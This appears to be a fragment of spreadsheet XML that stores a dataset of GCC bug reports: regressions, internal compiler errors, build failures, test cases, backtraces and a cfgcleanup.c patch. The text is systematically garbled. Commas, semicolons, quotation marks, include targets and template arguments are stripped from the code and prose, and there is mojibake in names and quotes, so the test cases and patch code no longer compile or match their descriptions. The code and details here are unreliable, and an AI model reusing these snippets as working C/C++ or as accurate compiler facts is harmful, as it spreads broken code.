GNU C version 2.95.2 19991024 (release) (hppa2.0n-hp-hpux11.00) compiled by CC.
 as -o gcc_nan_bug.o gcc_nan_bug.s
 /src/sicstus/install/hppa-hpux-B.11.00/lib/gcc-lib/hppa2.0n-hp-hpux11.00/2.95.2/collect2 -L/lib/pa1.1 -L/usr/lib/pa1.1 -z -u main -o gcc_nan_bug.exe /lib/crt0.o -L/src/sicstus/install/hppa-hpux-B.11.00/lib/gcc-lib/hppa2.0n-hp-hpux11.00/2.95.2 -L/src/sicstus/install/hppa-hpux-B.11.00/lib gcc_nan_bug.o -lm -lgcc -lc -lgcc
isnan(posnan) posnan is nan
ERROR</t>
  </si>
  <si>
    <t>GCC-53678</t>
  </si>
  <si>
    <t>[4.6 Regression] namespace pollution on NetBSD</t>
  </si>
  <si>
    <t>Created attachment 27623
patch for ctype_base.h
The fix for PR 47045 pollutes the global namespace:
#include 
int main()
{
  int NetBSD = 1
}
r.cc: In function 'int main()':
r.cc:5:7: error: expected unqualified-id before numeric constant
I received the attached patch from JÃ¶rg Sonnenberger a NetBSD toolchain developer and intend to commit it. This PR is to record the regression.</t>
  </si>
  <si>
    <t>GCC-32622</t>
  </si>
  <si>
    <t>BOOT_CFLAGS is not passed to stage2 and stage3 compile</t>
  </si>
  <si>
    <t>Hello!
/configure was invoked with:
/configure --with-mpfr=/usr/local --enable-languages=cc++fortran BOOT_CFLAGS=-O3 -march=nocona -msse3 -funroll-loops -ftree-vectorize -ffast-math -g
as suggested in gccinstall.info.
However BOOT_CFLAGS were not passed to stage2 or stage3 compile default -O2 -g -fomit-frame-pointer flags were used instead.</t>
  </si>
  <si>
    <t>GCC-19997</t>
  </si>
  <si>
    <t>enum5.C complitation failed to produce</t>
  </si>
  <si>
    <t>WARNING: g++.old-deja/g++.other/enum5.C compilation failed to produce 
executable</t>
  </si>
  <si>
    <t>giftbound</t>
  </si>
  <si>
    <t>GCC-53501</t>
  </si>
  <si>
    <t>[4.6 Regression] scev introduces signed overflow</t>
  </si>
  <si>
    <t>Created attachment 27509
preprocessed file for which the bug manifests
Sorry if this is a duplicate or if I miscategorized it (my first bug report here I did search for this and found nothing similar enough).
This bug appears both in gcc and g++ my best guess is that it has to do with incorrect optimization of a loop. Bug present at amd64 gcc versions 4.6.3 (Ubuntu) and 4.7.0 (compiled) details follow:
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.3-1ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) 
$ ./gcc -v # my build of 4.7.0
Using built-in specs.
COLLECT_GCC=./gcc
COLLECT_LTO_WRAPPER=/home/misof/Desktop/newgcc/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/home/misof/Desktop/newgcc/ --disable-multilib
Thread model: posix
gcc version 4.7.0 (GCC) 
Here is the offending source code:
$ cat bug.c
#include 
int e[100] n
void foo(void) {
    int i k = 0
    for (i = 0 i &lt; n ++i) { e[k] = 10 ++k e[k] = 10 ++k }
    for (i = 0 i &lt; k ++i) printf(%d\ne[i])
    printf(k=%d\nk)
}
int main(void) {
    n = 10
    foo()
    return 0
}
Up to my best knowledge this should be valid C code. When compiled without optimizations or with -O1 everything works as expected:
$ gcc -Wall -Wextra bug.c &amp;&amp; ./a.out
10
10
10
10
k=4
However once -O2 or more is used the second for-cycle seems to be incorrectly optimized away:
$ gcc -Wall -Wextra -O2 bug.c &amp;&amp; ./a.out
k=4
Interestingly -fwrapv does make a difference even though there seem to be no integer overflows in the code:
$ gcc -Wall -Wextra -O2 -fwrapv bug.c &amp;&amp; ./a.out 
10
10
10
10
k=4
Below is the complete stdout of
$ gcc -v -save-temps -Wall -Wextra -O2 bug.c 
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.3-1ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-O2' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.6/cc1 -E -quiet -v -imultilib . -imultiarch x86_64-linux-gnu bug.c -mtune=generic -march=x86-64 -Wall -Wextra -O2 -fpch-preprocess -fstack-protector -o bug.i
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../x86_64-linux-gnu/include
ignoring duplicate directory /usr/include/x86_64-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/include/x86_64-linux-gnu
 /usr/lib/gcc/x86_64-linux-gnu/4.6/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.6/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-O2' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.6/cc1 -fpreprocessed bug.i -quiet -dumpbase bug.c -mtune=generic -march=x86-64 -auxbase bug -O2 -Wall -Wextra -version -fstack-protector -o bug.s
GNU C (Ubuntu/Linaro 4.6.3-1ubuntu5) version 4.6.3 (x86_64-linux-gnu)
        compiled by GNU C version 4.6.3 GMP version 5.0.2 MPFR version 3.1.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (Ubuntu/Linaro 4.6.3-1ubuntu5) version 4.6.3 (x86_64-linux-gnu)
        compiled by GNU C version 4.6.3 GMP version 5.0.2 MPFR version 3.1.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 75e879ed14f91af504f4150eadeaa0e6
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-O2' '-mtune=generic' '-march=x86-64'
 as --64 -o bug.o bug.s
COMPILER_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.6/:/usr/lib/gcc/x86_64-linux-gnu/4.6/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.6/:/usr/lib/gcc/x86_64-linux-gnu/
LIBRARY_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.6/:/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../lib/:/lib/x86_64-linux-gnu/:/lib/../lib/:/usr/lib/x86_64-linux-gnu/:/usr/lib/../lib/:/usr/lib/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-O2' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.6/collect2 --sysroot=/ --build-id --no-add-needed --as-needed --eh-frame-hdr -m elf_x86_64 --hash-style=gnu -dynamic-linker /lib64/ld-linux-x86-64.so.2 -z relro /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/crt1.o /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/4.6/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/4.6 -L/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/4.6/../../.. bug.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-linux-gnu/4.6/crtend.o /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/crtn.o
Attached is the resulting bug.i file.</t>
  </si>
  <si>
    <t>misof</t>
  </si>
  <si>
    <t>GCC-15119</t>
  </si>
  <si>
    <t>[4.0 Regression] internal compiler error: in substitute_placeholder_in_expr at tree.c:2155</t>
  </si>
  <si>
    <t>Current mainline CVS g++ ICE at testcase with error:
---8X---------------------------
make ~/work/cpp/Test &gt; g++ test.cc -save-temps
test.cc: In function `int main()':
test.cc:16: internal compiler error: in substitute_placeholder_in_expr at 
tree.c:2155
Please submit a full bug report
---X8---------------------------
testcase:
---8X---------------------------
#include 
#include 
char const* descs[] = { 
     Test0: %s. 
     Test1: %s. 
     Test2: %s. 
     Test3: %s. 
     Test4: %s. 
}
int main() {   
    int t = 1
    char buf[100]
    std::string str = String
    sprintf( buf descs[ std::min(t-14) ] str.c_str() ) 
    return 0
}
---X8---------------------------</t>
  </si>
  <si>
    <t>GCC-8195</t>
  </si>
  <si>
    <t>n-th algorithm (STL) doesn`t work properly</t>
  </si>
  <si>
    <t>The simple testcase using nth_element() doesn`t work properly. Compiled by g++ (v.3.2 3.1 2.96) it gives the 4 4 5 6 6 6 9 12 8 10 but expected output is 4 4 5 6 6 6 8 9 10 12 (sorted sequence). See the testcase.
Release:
g++ v3.2
Environment:
Red Hat Linux release 8.0
How-To-Repeat:
Compile the testcase by g++ and run it compare output. The correct result is the sorted integers sequence.</t>
  </si>
  <si>
    <t>GCC-60000</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] GCC trunk build failure caused by the vectorizer</t>
  </si>
  <si>
    <t>GCC fails to build the following code with flags
g++ -O2 -fno-tree-vrp -ftree-vectorize foo.C
//foo.C:
void foo(bool* a int* b)
{
  for(int i = 0 i &lt; 1000 ++i)
  {
    a[i] = i % 2
    b[i] = i % 3
  }
}
The output message from GCC:
 void foo(bool* int*)
Analyzing compilation unit
Performing interprocedural optimizations
           Assembling functions:
 void foo(bool* int*)foo.C:3:3: note: loop vectorized
foo.C:3:3: note: loop versioned for vectorization because of possible aliasing
foo.C: In function â€˜void foo(bool* int*)â€™:
foo.C:1:6: internal compiler error: in vect_get_vec_def_for_operand at tree-vect-stmts.c:1449
 void foo(bool* a int* b)
      ^
0xf82cd5 vect_get_vec_def_for_operand(tree_node* gimple_statement_base* tree_node**)
	../../gcc/gcc/tree-vect-stmts.c:1449
0xf83194 vect_get_vec_defs(tree_node* tree_node* gimple_statement_base* vec* vec* _slp_tree* int)
	../../gcc/gcc/tree-vect-stmts.c:1634
0xf8e060 vectorizable_operation
	../../gcc/gcc/tree-vect-stmts.c:4785
0xf94be4 vect_transform_stmt(gimple_statement_base* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*)
	../../gcc/gcc/tree-vect-stmts.c:6959
0xfa8f0e vect_transform_loop(_loop_vec_info*)
	../../gcc/gcc/tree-vect-loop.c:6046
0xfbe02a vectorize_loops()
	../../gcc/gcc/tree-vectorizer.c:476
0xec9b80 tree_loop_vectorize
	../../gcc/gcc/tree-ssa-loop.c:154
0xec9c0a execute
	../../gcc/gcc/tree-ssa-loop.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-83084</t>
  </si>
  <si>
    <t>[7 Regression] -fcompare-debug failure on ppc64le</t>
  </si>
  <si>
    <t>On ppc64le:
trippels@gcc2-power8 out % cat v8-stack-trace-impl.ii
enum _Lock_policy { _S_atomic }
template  struct A {
  bool m_fn1()
  int _M_use_count
}
template  bool A::m_fn1() {
  int a
  do
    if (a)
      return 0
  while (__atomic_compare_exchange_n(
}
trippels@gcc2-power8 out % g++ --save-temps -fcompare-debug -O2 -c v8-stack-trace-impl.ii
g++: error: v8-stack-trace-impl.ii: -fcompare-debug failure
trippels@gcc2-power8 out % diff -u v8-stack-trace-impl.gkd v8-stack-trace-impl.gk.gkd
--- v8-stack-trace-impl.gkd     2017-11-21 06:00:22.288381883 +0000
+++ v8-stack-trace-impl.gk.gkd  2017-11-21 06:00:22.308382369 +0000
@@ -6916 +6916 @@
  -&gt; 10)
 (code_label # 0 0 8 (nil) [1 uses])
 (note # 0 0 [bb 5] NOTE_INSN_BASIC_BLOCK)
-(insn:TI # 0 0 (set (mem/v:BLK (scratch:DI) [  A8])
-        (unspec:BLK [
-                (mem/v:BLK (scratch:DI) [  A8])
-            ] UNSPEC_LWSYNC)) v8-stack-trace-impl.ii:11# {*lwsync}
-     (nil))
 (insn:TI # 0 0 (set (reg:SI 10 10 [138])
         (unspec_volatile:SI [
                 (mem/v:SI (reg/f:DI 3 3 [orig:131 this ] [131]) [  S4 A32])
             ] UNSPECV_LL)) v8-stack-trace-impl.ii:11# {load_lockedsi}
      (nil))
+(insn:TI # 0 0 (set (mem/v:BLK (scratch:DI) [  A8])
+        (unspec:BLK [
+                (mem/v:BLK (scratch:DI) [  A8])
+            ] UNSPEC_LWSYNC)) v8-stack-trace-impl.ii:11# {*lwsync}
+     (nil))
 (insn:TI # 0 0 (set (reg:CC 68 0 [141])
         (compare:CC (reg:SI 10 10 [138])
             (const_int 0 [0]))) v8-stack-trace-impl.ii:11# {*cmpsi_signed}</t>
  </si>
  <si>
    <t>GCC-9692</t>
  </si>
  <si>
    <t>Fix latent bug in crossjumping</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi
 gcc creates a reference to an undefined label when compiling the
 attached testcase with -O -fpic.
 I have analyzed it and have found out that problem is in the condition
 in the beginning of function outgoing_edges_match in cfgcleanup.c
 When BB1 and BB2 end with a table jump insn
 (i.e. a jump_insn which has a parallel of set pc and use label inside
 and which jumps to jump_insn with addr_vec or addr_dif_vec inside)
 tablejump instruction)
 the function outgoing_edges_match returns that the outgoing edges match
 without checking the tablejumps (comparing and unifying of tablejumps is
 not implemented yet) and it never reaches the comment
 /* Generic case - we are seeing a computed jump table jump or trapping
      instruction.  */
 which should be reached the we have a tablejump.
 One table jump is then removed (without checking whether it is identical
 with the second one so it may produce wrong code too) and the label
 references are not updated.
 This patch changes the condition in the beginning of function
 outgoing_edges_match.
 When there is one normal (!(EDGE_COMPLEX | EDGE_FAKE)) outgoing edge from bb1
 and one normal outgoing edge from bb2 each block must end with a
 non-jump insn or a simplejump_p jump (i.e. when there is a jump in the
 end of block it is a simplejump and not some of the strange jumps).
 This patch fixes the bug when compiling the testcase.
 Bootstrapped/regtested mainline i386 (pentium4).
 OK for mainline 3_3-branch and 3_2-branch?
 Josef
 PS: I thank Steven Bosscher 
 for locating the bug to crossjumping.
 Testcase:
 int *g
 int main (void)
 {
   switch (*g)
     {
     case 0:
       {
         switch (*g)
           {
           case 0: *g = 1 break
           case 1:
           case 2: *g = 1 break
           case 3:
           case 4: *g = 1 break
           }
         break
       }
     case 1:
       {
         switch (*g)
           {
           case 0: *g = 1 break
           case 1:
           case 2: *g = 1 break
           case 3:
           case 4: *g = 1 break
           }
       }
     }
   return 0
 }
 2003-02-13  Josef Zlomek  
 	* cfgcleanup.c (outgoing_edges_match): When there is single outgoing edge
 	and block ends with a jump insn it must be simple jump.
 Index: cfgcleanup.c
 ===================================================================
 RCS file: /cvs/gcc/gcc/gcc/cfgcleanup.cv
 retrieving revision 1.71
 diff -u -c -3 -p -r1.71 cfgcleanup.c
 *** cfgcleanup.c	10 Feb 2003 19:18:42 -0000	1.71
 --- cfgcleanup.c	13 Feb 2003 10:23:04 -0000
 *************** outgoing_edges_match (mode bb1 bb2)
 *** 11191127 ****
     /* If BB1 has only one successor we may be looking at either an
        unconditional jump or a fake edge to exit.  */
     if (bb1-&gt;succ &amp;&amp; !bb1-&gt;succ-&gt;succ_next
 !       &amp;&amp; !(bb1-&gt;succ-&gt;flags &amp; (EDGE_COMPLEX | EDGE_FAKE)))
       return (bb2-&gt;succ &amp;&amp;  !bb2-&gt;succ-&gt;succ_next
 ! 	    
     /* Match conditional jumps - this may get tricky when fallthru and branch
        edges are crossed.  */
 --- 11191129 ----
     /* If BB1 has only one successor we may be looking at either an
        unconditional jump or a fake edge to exit.  */
     if (bb1-&gt;succ &amp;&amp; !bb1-&gt;succ-&gt;succ_next
 !       &amp;&amp; (bb1-&gt;succ-&gt;flags &amp; (EDGE_COMPLEX | EDGE_FAKE)) == 0
 !       &amp;&amp; (GET_CODE (bb1-&gt;end) != JUMP_INSN || simplejump_p (bb1-&gt;end)))
       return (bb2-&gt;succ &amp;&amp;  !bb2-&gt;succ-&gt;succ_next
 ! 	    &amp;&amp; (bb2-&gt;succ-&gt;flags &amp; (EDGE_COMPLEX | EDGE_FAKE)) == 0
 ! 	    
     /* Match conditional jumps - this may get tricky when fallthru and branch
        edges are crossed.  */
Release:
unknown</t>
  </si>
  <si>
    <t>zlomj9am</t>
  </si>
  <si>
    <t>GCC-3075</t>
  </si>
  <si>
    <t>in-source dir fails</t>
  </si>
  <si>
    <t>configuring in the source tree fails during the bootstrap
in the boehm-gc and I think it will later in libjava.
although not recommended we don't ban it.
see thread at http://gcc.gnu.org/ml/gcc-bugs/2001-06/msg00153.html
Release:
3.0 pre
Environment:
any</t>
  </si>
  <si>
    <t>GCC-37322</t>
  </si>
  <si>
    <t>[4.4 Regression] FAIL: gfortran.dg/debug/pr35154-dwarf2.f</t>
  </si>
  <si>
    <t>On 686-apple-darwin9 between revisions 139622 (working or not implemented) and 139843 (broken) I have the following failures:
FAIL: gfortran.dg/debug/pr35154-dwarf2.f -gdwarf-2 scan-assembler DW_AT_name: __BLNK__
FAIL: gfortran.dg/debug/pr35154-dwarf2.f -gdwarf-2 scan-assembler DW_AT_name: label
looking at the assembly code I see:
	.indirect_symbol ___BLNK__
	.indirect_symbol _label_
but no 'DW_AT_name:'.
Note tha my comment #5 in pr35154 is invalid.</t>
  </si>
  <si>
    <t>GCC-81236</t>
  </si>
  <si>
    <t>Crash when calling a template member function from generic lambda</t>
  </si>
  <si>
    <t>This causes current G++ (7.1.1) to crash:
    #include 
    template 
    constexpr void for_sequence(std::integer_sequence F&amp;&amp; f) {
        using unpack_t = int[]
        (void)unpack_t{(static_cast(f(std::integral_constant{})) 0)... 0}
    }
    template
    struct MyType {
        void crash() {
            for_sequence(std::make_index_sequence::value&gt;{} [&amp;](auto i){
                make_crash() // Line (1)
            })
        }
        template
        void make_crash() {}
    }
    int main() {
        MyType&gt; test
        test.crash()
    }
Commenting line marked as `(1)` makes the code compile.
This code is valid and compiles under clang (3.8.0)</t>
  </si>
  <si>
    <t>gufideg</t>
  </si>
  <si>
    <t>GCC-35607</t>
  </si>
  <si>
    <t>[4.4 Regression] IVOPTs produces invalid gimple</t>
  </si>
  <si>
    <t>extern void (*__fini_array_start []) (void)
extern void (*__fini_array_end []) (void)
void
__libc_csu_fini (void)
{
  __SIZE_TYPE__ i = __fini_array_end - __fini_array_start
  while (i-- &gt; 0)
    (*__fini_array_start [i]) ()
}
./cc1 -quiet elf-init.i -O
elf-init.i: In function '__libc_csu_fini':
elf-init.i:5: error: invalid array index
(unsigned int) D.1189_5
elf-init.i:5: internal compiler error: verify_stmts failed
The offending stmt is
  # ivtmp.16_1 = PHI 
it eventually should have used i_6 which is available as
  i_6 = (unsigned int) D.1189_5
working in rev. 133101 failing since at least rev. 133134. which includes
the fix for PR31358 which is likely the cause.</t>
  </si>
  <si>
    <t>GCC-6005</t>
  </si>
  <si>
    <t>gcj fails to build rhug on alpha</t>
  </si>
  <si>
    <t>gcj fails to build rhug on the alpha.
This is the error:
gcj -C --encoding=8859_1 --classpath=upstream/src:../../rhug/xerces/upstream/src -O2 -d upstream/src ../../rhug/xerces/upstream/src/org/apache/xerces/validators/common/CMStateSet.java
../../rhug/xerces/upstream/src/org/apache/xerces/validators/common/CMStateSet.java: In class `org.apache.xerces.validators.common.CMStateSet':
../../rhug/xerces/upstream/src/org/apache/xerces/validators/common/CMStateSet.java: In method `org.apache.xerces.validators.common.CMStateSet.isEmpty()':
../../rhug/xerces/upstream/src/org/apache/xerces/validators/common/CMStateSet.java:180: internal error in generate_bytecode_insn - tree code not implemented: bit_field_ref
../../rhug/xerces/upstream/src/org/apache/xerces/validators/common/CMStateSet.java:180: confused by earlier errors bailing out
The problem is that fold() generates a bit field operation as an optimization.
Release:
gcj (GCC) 3.1 20020318 (prerelease)
Environment:
alphaev67-unknown-linux-gnu</t>
  </si>
  <si>
    <t>GCC-14607</t>
  </si>
  <si>
    <t>[3.3 Regression] Duplicate symbol vtable for node in files div.o and env.o</t>
  </si>
  <si>
    <t>The following errors occured building groff-1.19 on the above target
with gcc version 3.3.4 20040306 (prerelease):
g++ -O2 -s -o troff dictionary.o div.o env.o glyphuni.o input.o majorminor.o nod
e.o number.o reg.o symbol.o unicode.o uniglyph.o uniuni.o /xxx/gnu/groff-1.19/ob
jdir3.3/src/libs/libgroff/libgroff.a  -lm
/usr/ccs/bin/ld: Duplicate symbol vtable for node in files div.o and env.o
/usr/ccs/bin/ld: Duplicate symbol typeinfo for node in files div.o and env.o
/usr/ccs/bin/ld: Duplicate symbol typeinfo name for node in files div.o and en
v.o
/usr/ccs/bin/ld: Duplicate symbol vtable for node in files div.o and input.o
/usr/ccs/bin/ld: Duplicate symbol typeinfo for node in files div.o and input.o
/usr/ccs/bin/ld: Duplicate symbol typeinfo name for node in files div.o and in
put.o
/usr/ccs/bin/ld: Duplicate symbol vtable for node in files div.o and node.o
/usr/ccs/bin/ld: Duplicate symbol typeinfo for node in files div.o and node.o
/usr/ccs/bin/ld: Duplicate symbol typeinfo name for node in files div.o and no
de.o
The problem doesn't occur with gcc 3.0.3.
I'm not sure of the the details as to when vtables should be emitted as
global objects.  The 3.3.4 assembler output has for example the following
code in div.o:
        .IMPORT _ZTV4nodeDATA
	...
        .EXPORT _ZTV4nodeDATA
        .align 8
_ZTV4node	
        .word   0
        .word   _ZTI4node
        .word   P%_ZN4nodeD1Ev
        .word   P%_ZN4nodeD0Ev
        .word   P%__cxa_pure_virtual
        .word   P%_ZN4node17set_unformat_flagEv
	...
_ZN4nodeD1Ev
        .PROC
        .CALLINFO FRAME=64NO_CALLS
        .ENTRY
        addil LR'_ZTV4node-$global$%r27
        ldo 64(%r30)%r30
        ldo RR'_ZTV4node-$global$+8(%r1)%r1
	...
The same code is duplicated in the assembler out put for env.cpp
and input.cpp.
The assembler output from 3.0.3 doesn't have or export the vtable for
node.  The table is only defined by input.o.
The hppa1.1-hp-hpux10.20 port doesn't support weak symbols.
In ports that support weak symbols the vtables are weak avoiding
this problem.
I'm not sure of all the requirements for vtables.  For example can
they be local to a translation unit and duplicated?</t>
  </si>
  <si>
    <t>GCC-12992</t>
  </si>
  <si>
    <t>internal compiler error: segmentation fault for g++</t>
  </si>
  <si>
    <t>Compiling ends with segfault for the following simple code (tested on 
several Linux 2.4 machines: Slackware Suse Debian):
---------------------------------------------------------------------
template  struct Int2Type {
        enum { value = v }
}
struct MyPtr { int getInt() { return 0 } }
template  Int2Type NameDefined() {
        return Int2Type&lt; sizeof(
}
template  Int2Type NameDefined(...) {
        return Int2Type()
}
int main() {
        NameDefined().value
        return 0
}</t>
  </si>
  <si>
    <t>scamel</t>
  </si>
  <si>
    <t>GCC-60910</t>
  </si>
  <si>
    <t>[4.10 regression] sparc-linux bootstrap failure due to many invalid conversion from 'int' to 'machine_mode' errors</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.10-20140420 (r209538) on sparc64-linux fails with:
g++ -c   -g -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings   -DHAVE_CONFIG_H -I. -I. -I/mnt/scratch/gcc-4.10-20140420/gcc -I/mnt/scratch/gcc-4.10-20140420/gcc/. -I/mnt/scratch/gcc-4.10-20140420/gcc/../include -I/mnt/scratch/gcc-4.10-20140420/gcc/../libcpp/include -I/home/mikpe/pkgs/linux-sparc64/gmp-5.1.3/include -I/home/mikpe/pkgs/linux-sparc64/mpfr-3.1.2/include -I/home/mikpe/pkgs/linux-sparc64/mpc-1.0.2/include  -I/mnt/scratch/gcc-4.10-20140420/gcc/../libdecnumber -I/mnt/scratch/gcc-4.10-20140420/gcc/../libdecnumber/dpd -I../libdecnumber -I/mnt/scratch/gcc-4.10-20140420/gcc/../libbacktrace    -o sparc.o -MT sparc.o -MMD -MP -MF ./.deps/sparc.TPo /mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c
In file included from /mnt/scratch/gcc-4.10-20140420/gcc/tree-core.h:24:0
                 from /mnt/scratch/gcc-4.10-20140420/gcc/tree.h:23
                 from /mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:27:
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c: In function 'void sparc_init_modes()':
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4829:8: note: in expansion of macro 'GET_MODE_SIZE'
    if (GET_MODE_SIZE (i) &lt; 4)
        ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4831:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 4)
             ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4833:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 8)
             ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4835:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 16)
             ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4837:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 32)
             ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4843:8: note: in expansion of macro 'GET_MODE_SIZE'
    if (GET_MODE_SIZE (i) == 4)
        ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4845:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 8)
             ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4852:8: note: in expansion of macro 'GET_MODE_SIZE'
    if (GET_MODE_SIZE (i) == 4)
        ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
